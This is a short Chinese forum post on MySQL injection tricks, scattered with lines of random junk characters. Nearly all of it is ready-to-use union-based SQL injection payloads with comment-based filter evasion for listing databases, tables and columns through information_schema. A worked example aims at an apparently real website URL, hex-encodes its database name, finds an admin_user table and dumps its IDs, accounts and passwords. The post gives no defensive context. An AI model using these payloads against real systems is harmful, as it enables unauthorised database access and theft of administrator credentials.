mysql注入技巧

admin

查库
! x) G  c# T' u
% g  `3 }, a" W2 `( pid=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*
6 l+ K6 p1 n% a' L" A* w
查表

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1

; K, H( C) x! p, q  J查段
, W7 v' a8 V0 ]% H
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
8 T, P# u. a! d9 d; w6 G
% _1 R1 r# ~7 t5 S$ Z% }  y
$ a3 u5 ^. {  u2 fmysql5高级注入方法暴表

. \8 x1 K4 m! g8 p3 A& v8 n8 I, n( N例子如下:
7 C1 q3 l! g" \1 V' ?
1.爆表
7 ^# `9 K% J  h  Ehttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
这样爆到第4个时出现了admin_user表。
1 J; }3 G/ N( m& `- j' y
2.暴字段
% s9 q3 v7 k* e( o: T' Y" R% ]! ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*


3.爆密码
( N( \+ s$ G* \. G8 N$ b3 uhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
! \! \+ [. f# F( S
9 ~+ _, t. M" Y4 [
7 z" `+ Z8 Q: [2 O+ {- {